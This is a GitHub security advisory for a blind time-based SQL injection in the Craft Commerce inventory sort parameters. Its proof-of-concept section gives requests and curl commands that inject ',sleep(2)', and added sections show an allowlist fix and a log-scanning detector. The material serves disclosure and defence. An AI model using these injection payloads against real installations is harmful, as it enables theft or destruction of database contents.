GHSA-PMGJ-GMM4-JH6J
Vulnerability from github – Published: 2026-03-10 18:23 – Updated: 2026-03-10 22:54
Summary
Craft Commerce is vulnerable to SQL Injection in Commerce Inventory Table Sorting
Details
Summary
Craft Commerce is vulnerable to SQL Injection in the inventory levels table data endpoint. The sort[0][direction] and sort[0][sortField] parameters are concatenated directly into an addOrderBy() clause without any validation or sanitization. An authenticated attacker with access to the Commerce Inventory section can inject arbitrary SQL queries, potentially leading to a full database compromise.
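As an added illustration (not code from Craft Commerce, and not the fix in the commits referenced in this record), the following PHP places the unsafe pattern the summary describes, request strings concatenated into an ORDER BY, next to an allowlist-based version that hands `yii\db\Query::addOrderBy()` only a `[column => SORT_ASC|SORT_DESC]` array. The function names and the column allowlist are assumptions chosen for this example.

```php
<?php
declare(strict_types=1);

// Added example, not code from Craft Commerce. Function names and the
// column allowlist are assumptions chosen for illustration.

// Columns the inventory table may be sorted on (assumed list).
const ALLOWED_SORT_FIELDS = ['sku', 'onHand', 'reserved', 'available'];

/**
 * Unsafe pattern as described in the advisory: the request-controlled
 * sortField and direction values become part of the SQL text unchanged,
 * so a value such as "sku,sleep(2)" is emitted verbatim into ORDER BY.
 */
function unsafeOrderBy(array $sort): string
{
    $field = $sort[0]['sortField'] ?? 'sku';
    $direction = $sort[0]['direction'] ?? 'asc';

    return $field . ' ' . $direction;
}

/**
 * Hardened pattern: request values are only ever compared against an
 * allowlist and then replaced by server-side constants. The return value
 * is the array form accepted by yii\db\Query::addOrderBy(), whose query
 * builder quotes the column name itself; no request string reaches SQL.
 * Unknown fields or directions are rejected rather than passed through.
 */
function safeOrderBy(array $sort): array
{
    $field = (string)($sort[0]['sortField'] ?? 'sku');
    $direction = strtolower((string)($sort[0]['direction'] ?? 'asc'));

    if (!in_array($field, ALLOWED_SORT_FIELDS, true)) {
        throw new InvalidArgumentException('Unsupported sort field');
    }
    if ($direction !== 'asc' && $direction !== 'desc') {
        throw new InvalidArgumentException('Unsupported sort direction');
    }

    return [$field => $direction === 'desc' ? SORT_DESC : SORT_ASC];
}

// Constructed request input modelled on the advisory's payload.
$tampered = [['sortField' => 'sku,sleep(2)', 'direction' => 'asc']];
$benign   = [['sortField' => 'onHand',       'direction' => 'DESC']];

// The unsafe version passes the payload straight through into the ORDER BY text.
echo "unsafe: ", unsafeOrderBy($tampered), PHP_EOL;

// The hardened version rejects the tampered input and accepts only allowlisted values.
try {
    safeOrderBy($tampered);
} catch (InvalidArgumentException $e) {
    echo "safe: rejected tampered sort (", $e->getMessage(), ")", PHP_EOL;
}
var_export(safeOrderBy($benign));
echo PHP_EOL;

// In a controller the result would be applied as $query->addOrderBy(safeOrderBy($sort)).
```

Two design points. First, the array form matters: Yii's query builder passes column names that contain parentheses through without quoting, so handing `addOrderBy()` a string built from request input gives no protection, whereas with `[column => SORT_ASC]` the only request-derived value is a key that has already been matched against the allowlist. Second, rejecting an unknown field (mapped to a 400 response in the controller) rather than silently falling back to a default makes tampering visible in application logs.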
PoC
Required Permissions
- General
  - Access the control panel
  - Access Craft Commerce
- Craft Commerce
  - Manage inventory stock levels
Steps to reproduce
- Log in to the control panel
- Navigate to Commerce > Inventory
- Click on any sortable column header (e.g., "SKU") to trigger a sort request
- Intercept the request and modify the sort[0][direction] or sort[0][sortField] parameter, appending the ,sleep(2) payload to its current value as follows:
# sort[0][sortField]=sku,sleep(2)
GET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort[0][sortField]=sku,sleep(2)&sort[0][direction]=asc&inventoryLocationId=1&containerId=%23inventory-levels
# sort[0][direction]=asc,sleep(2)
GET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort[0][sortField]=sku&sort[0][direction]=asc,sleep(2)&inventoryLocationId=1&containerId=%23inventory-levels
- Observe the delay in the response, confirming the injection
Alternatively, you can use the following curl (bash syntax) command (replace cookie and target domain as needed):
# sort[0][sortField]=sku,sleep(2)
curl --path-as-is -k -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json, text/plain, */*' -b $'<Cookie>' $'http://craft.local/index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort%5b0%5d%5bfield%5d=purchasable&sort%5b0%5d%5bsortField%5d=sku,sleep(2)&sort%5b0%5d%5bdirection%5d=asc&page=1&per_page=25&inventoryLocationId=1&containerId=%23inventory-levels'
# sort[0][direction]=asc,sleep(2)
curl --path-as-is -k -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json, text/plain, */*' -b $'<Cookie>' $'http://craft.local/index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort%5b0%5d%5bfield%5d=purchasable&sort%5b0%5d%5bsortField%5d=sku&sort%5b0%5d%5bdirection%5d=asc,sleep(2)&page=1&per_page=25&inventoryLocationId=1&containerId=%23inventory-levels'
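The defender's counterpart to the requests above, as an added example that is not part of the advisory or of Craft: a small PHP scanner that flags access-log requests to the inventory-levels endpoint whose sort parameters carry anything other than a plain column identifier and asc/desc. The log lines are constructed for the example; only the endpoint path and the parameter names come from the advisory.

```php
<?php
declare(strict_types=1);

// Added example, not from the advisory or from Craft. The log lines below
// are constructed; the endpoint path and sort parameter names are the
// ones the advisory describes.

const INVENTORY_ENDPOINT = 'admin/actions/commerce/inventory/inventory-levels-table-data';

/**
 * Extract the request target ("/path?query") from an access-log line in
 * common/combined format. Returns null when the line does not match.
 */
function requestTarget(string $logLine): ?string
{
    return preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $logLine, $m) ? $m[1] : null;
}

/**
 * Returns the names of sort parameters that do not look like sorting the
 * control-panel UI would generate (empty array when the request looks fine
 * or targets another endpoint). parse_str() decodes the sort[0][sortField]
 * bracket syntax into a nested array, so the percent-encoded form seen in
 * the curl variant is handled identically to the literal form.
 */
function suspiciousSortParams(string $target): array
{
    $query = parse_url($target, PHP_URL_QUERY);
    if (!is_string($query)) {
        return [];
    }
    parse_str($query, $params);
    if (($params['p'] ?? null) !== INVENTORY_ENDPOINT || !is_array($params['sort'] ?? null)) {
        return [];
    }

    $flagged = [];
    foreach ($params['sort'] as $i => $clause) {
        if (!is_array($clause)) {
            continue;
        }
        // A legitimate sort field is a bare column identifier.
        if (isset($clause['sortField'])
            && !preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', (string)$clause['sortField'])) {
            $flagged[] = "sort[$i][sortField]";
        }
        // A legitimate direction is exactly asc or desc.
        if (isset($clause['direction'])
            && !in_array(strtolower((string)$clause['direction']), ['asc', 'desc'], true)) {
            $flagged[] = "sort[$i][direction]";
        }
    }
    return $flagged;
}

// Constructed sample lines: one legitimate sort, two tampered ones, one unrelated request.
$logLines = [
    '10.0.0.5 - admin [10/Mar/2026:18:30:01 +0000] "GET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort[0][sortField]=sku&sort[0][direction]=asc&inventoryLocationId=1 HTTP/1.1" 200 812',
    '10.0.0.5 - admin [10/Mar/2026:18:30:09 +0000] "GET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort%5b0%5d%5bsortField%5d=sku,sleep(2)&sort%5b0%5d%5bdirection%5d=asc&inventoryLocationId=1 HTTP/1.1" 200 812',
    '10.0.0.5 - admin [10/Mar/2026:18:30:14 +0000] "GET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort[0][sortField]=sku&sort[0][direction]=asc,sleep(2)&inventoryLocationId=1 HTTP/1.1" 200 812',
    '10.0.0.7 - - [10/Mar/2026:18:31:00 +0000] "GET /index.php?p=admin/dashboard HTTP/1.1" 200 4120',
];

foreach ($logLines as $n => $line) {
    $target = requestTarget($line);
    $flagged = $target === null ? [] : suspiciousSortParams($target);
    if ($flagged !== []) {
        echo "line $n: tampered sort parameter(s): ", implode(', ', $flagged), PHP_EOL;
    }
}
```

Two further signals complement the parameter check: if the web server logs request duration (Apache `%D`, nginx `$request_time`), a time-based payload shows up as a cluster of slow responses on this one endpoint, and because the endpoint requires the "Manage inventory stock levels" permission, the set of accounts that can reach it is small enough to review directly when a flagged line appears.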
Impact
With this Blind SQLi, an attacker can:
- Exfiltrate data character-by-character using time-based techniques.
- Modify or destroy data (drop tables, update records, alter schema).
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.5.2"
},
"package": {
"ecosystem": "Packagist",
"name": "craftcms/commerce"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0"
},
{
"fixed": "5.5.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-29174"
],
"database_specific": {
"cwe_ids": [
"CWE-89"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-10T18:23:25Z",
"nvd_published_at": "2026-03-10T20:16:38Z",
"severity": "HIGH"
},
"details": "## Summary\n\nCraft Commerce is vulnerable to **SQL Injection** in the inventory levels table data endpoint. The `sort[0][direction]` and `sort[0][sortField]` parameters are concatenated directly into an `addOrderBy()` clause without any validation or sanitization. An authenticated attacker with access to the Commerce Inventory section can inject arbitrary SQL queries, potentially leading to a full database compromise.\n\n---\n## PoC\n### Required Permissions\n- General\n\t- Access the control panel\n\t- Access Craft Commerce\n- Craft Commerce\n\t- Manage inventory stock levels \n\n### Steps to reproduce\n1. Log in to the control panel\n2. Navigate to **Commerce** \u003e **Inventory**\n3. Click on any sortable column header (e.g., \"SKU\") to trigger a sort request\n4. Intercept the request and modify `sort[0][direction]` or `sort[0][sortField]` parameters and append `,sleep(2)` payload to it\u0027s current value as follows:\n\n```bash\n# sort[0][sortField]=sku,sleep(2)\nGET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data\u0026sort[0][sortField]=sku,sleep(2)\u0026sort[0][direction]=asc\u0026inventoryLocationId=1\u0026containerId=%23inventory-levels\n# sort[0][direction]=asc,sleep(2)\nGET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data\u0026sort[0][sortField]=sku\u0026sort[0][direction]=asc,sleep(2)\u0026inventoryLocationId=1\u0026containerId=%23inventory-levels\n```\n\n6. Observe the delay in the response, confirming the injection\n\nAlternatively, you can use the following `curl` (bash syntax) command (replace cookie and target domain as needed):\n```bash\n# sort[0][sortField]=sku,sleep(2)\ncurl --path-as-is -k -H $\u0027User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0\u0027 -H $\u0027Accept: application/json, text/plain, */*\u0027 -b $\u0027\u003cCookie\u003e\u0027 $\u0027http://craft.local/index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data\u0026sort%5b0%5d%5bfield%5d=purchasable\u0026sort%5b0%5d%5bsortField%5d=sku,sleep(2)\u0026sort%5b0%5d%5bdirection%5d=asc\u0026page=1\u0026per_page=25\u0026inventoryLocationId=1\u0026containerId=%23inventory-levels\u0027\n# sort[0][direction]=asc,sleep(2)\ncurl --path-as-is -k -H $\u0027User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0\u0027 -H $\u0027Accept: application/json, text/plain, */*\u0027 -b $\u0027\u003cCookie\u003e\u0027 $\u0027http://craft.local/index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data\u0026sort%5b0%5d%5bfield%5d=purchasable\u0026sort%5b0%5d%5bsortField%5d=sku\u0026sort%5b0%5d%5bdirection%5d=asc,sleep(2)\u0026page=1\u0026per_page=25\u0026inventoryLocationId=1\u0026containerId=%23inventory-levels\u0027\n```\n\n### Impact\nWith this Blind SQLi, an attacker can:\n- **Exfiltrate data** character-by-character using time-based techniques.\n- **Modify or destroy data** (drop tables, update records, alter schema).",
"id": "GHSA-pmgj-gmm4-jh6j",
"modified": "2026-03-10T22:54:57Z",
"published": "2026-03-10T18:23:25Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/craftcms/commerce/security/advisories/GHSA-pmgj-gmm4-jh6j"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29174"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/commerce/commit/094d69df24b925544f337c38e2ec1effcd5395c7"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/commerce/commit/a2ea853935ef03297ea1298bdb0d8c55ec5daf7b"
},
{
"type": "PACKAGE",
"url": "https://github.com/craftcms/commerce"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Craft Commerce is vulnerable to SQL Injection in Commerce Inventory Table Sorting"
}